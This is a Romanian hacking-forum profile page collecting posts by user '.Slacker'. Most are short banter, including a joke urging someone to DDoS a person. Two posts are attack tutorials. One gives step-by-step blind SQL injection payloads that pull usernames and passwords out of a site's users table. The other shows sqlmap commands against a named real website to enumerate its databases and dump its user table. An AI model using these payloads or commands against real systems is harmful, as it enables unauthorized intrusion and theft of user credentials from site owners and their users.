Jump to content

.Slacker

Active Members
  • Posts

    294
  • Joined

  • Last visited

Everything posted by .Slacker

  1. Eu il folosesc sa sparg hashurile
  2. Bravo ma bine ca ai editat Nu e vorba de asta omule de download sau ceva..E vorba ca nu e hack. E fix pielea pulii
  3. Si ce cauta asta la programe hack?
  4. Bine ca le "place":))))))
  5. Super.
  6. Testat si functioneaza. Fugi dupa el
  7. OFF: Devine enervant ON: Bun venit, redu numarul emoticoanelor.
  8. Programele sunt bune pentru ca le-am testat in trecut. Acum, nu stiu cat de bune sunt, dar cand voi avea timp voi face un test
  9. .Slacker

    Am racit

    Ai lasat fereastra deschisa la hotelul din costinesti?))
  10. Track si DDoS Apoi ii trimiti o cruce pe adresa
  11. Ai grija ca fac atac la persoana:)) Si daca tu ai fost retard si ti-ai luat teapa, vrei sa dai alta la randul tau?
  12. SQLi Inject pentru site-uri vulnerabile
  13. 3:23 - Ce cratima are ma-ta
  14. In costinesti gasim: -Cocalari: -Lautari: -Scandaluri: etc:))
  15. Le aruncam grenade pe geam
  16. Ai stat tu asa si ce ai zis? Ma..cu jocurile nu mai merge..mai bine ma fac hacker:)) ON: Bun venit, sedere placuta
  17. Bine ai venit. ":))"
  18. Nu vezi ca e banned? Poate cand revine
  19. Blind SQLi Injection .Slacker 30 August 2012 Sa luam ca exemplu: http://www.site.com/news.php?id=5 http://www.site.com/news.php?id=5 and 1=1 <= unde 1=1 este adevarat http://www.site.com/news.php?id=5 and 1=2 <= unde 1=2 este fals 1. MySQL Pentru blind vom folosii substring. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4 Inlocuim 4 cu 5 daca query-ul este adevarat. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5 2. Subselect Cand nu functioneaza vom folosii subselect. http://www.site.com/news.php?id=5 and (select 1)=1 Acum vom vedea daca avem acces la mysql.user http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1 Daca pagina se incarca in mod normal, avem acces la mysql.user 3. Verificarea numelui tabelelor si coloanelor http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (cu limit 0,1 query-ul rezulta un rand de date din cauza subselect-ului. Daca pagina se incarca in mod normal, fara continut lipsa, exista. Daca avem FALSE lipsete un articol schimbam doar numele tabelului pana cand il ghicim. Sa zicem ca numele tabelului cu utilizatori este users. Acum avem nevoie de numele coloanei. http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1 Daca pagina se incarca in mod normal, inseamna ca numele coloanei este Password. Avem o coloana cu parola. 4. Extragerea datelor din baza de date Daca am gasit tabelul cu utilizatori si coloana, parola si numele de utilizator, vom extragere caracterele din lista. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80 Convertim caracterul 1 in valoare ASCII ( ASCII() ) Vom incerca sa ajungem la FALSE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95 Am ajuns la TRUE si trebuie sa pastram incrementarea. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 Avem TRUE din nou. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Acum avem FALSE. Primul caracter din USERNAME este char(99) Convertim in ASCII: char(99) este scris 'c'. Sa verificam al doilea caracter: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99 Am schimbat ,1,1 in ,2,1 pentru a obtine al doilea caracter. Acum ne intorcem la caracterul 1: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 Pagina ar trebuii sa se incarce in mod normal deci este TRUE. http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107 Este fals si reducem numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104 Este adevarat si ridicam numarul: http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105 Fals. Deci al doilea caracter este char(105) si este 'i', si avem 'ci' in masura atunci ca incrementam pana la sfarsit atunci cand >0 returneaza fals (FALSE) stim ca ajungem la final. Sper ca am ajutat cu acest tutorial
  20. The vulnerable link I’m going to use is (more vulneable link's at the end) "http://www.waterufo.net/item.php?id=200" 1. Open BackTrack5 and Open a new Konsole Type the file path of sqlmap: cd /pentest/web/scanners/sqlmap Next step is.. /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --level 5 --risk 3 --dbs (If we want to scan the full website, the syntax will be ./sqlmap.py -u Welcome to Water UFO Research Site --level 5 --risk 3 --dbs) We got information that the parameter is injectable Type 'N' (I’m stopping the scan because i got one injectable parameter, if u want u can continue the scan) We got the database names The next step is to find the tables and columns on the database, I’m taking the database “waterufo_net” /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --tables -D waterufo_net We got all the tables in the database: Next we have to find the columns in the table fl_users /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net it will display the columns on the database: to retrieve the column values type --dump at the end of the previous query: /sqlmap.py -u http://www.waterufo.net/item.php?id=200 --columns -T fl_users -D waterufo_net --dump Sursa: hakforums.net
  21. Da. Bagi 004076..
  22. Merge Test: Slacker - GO SLIDE SMS
×
×
  • Create New...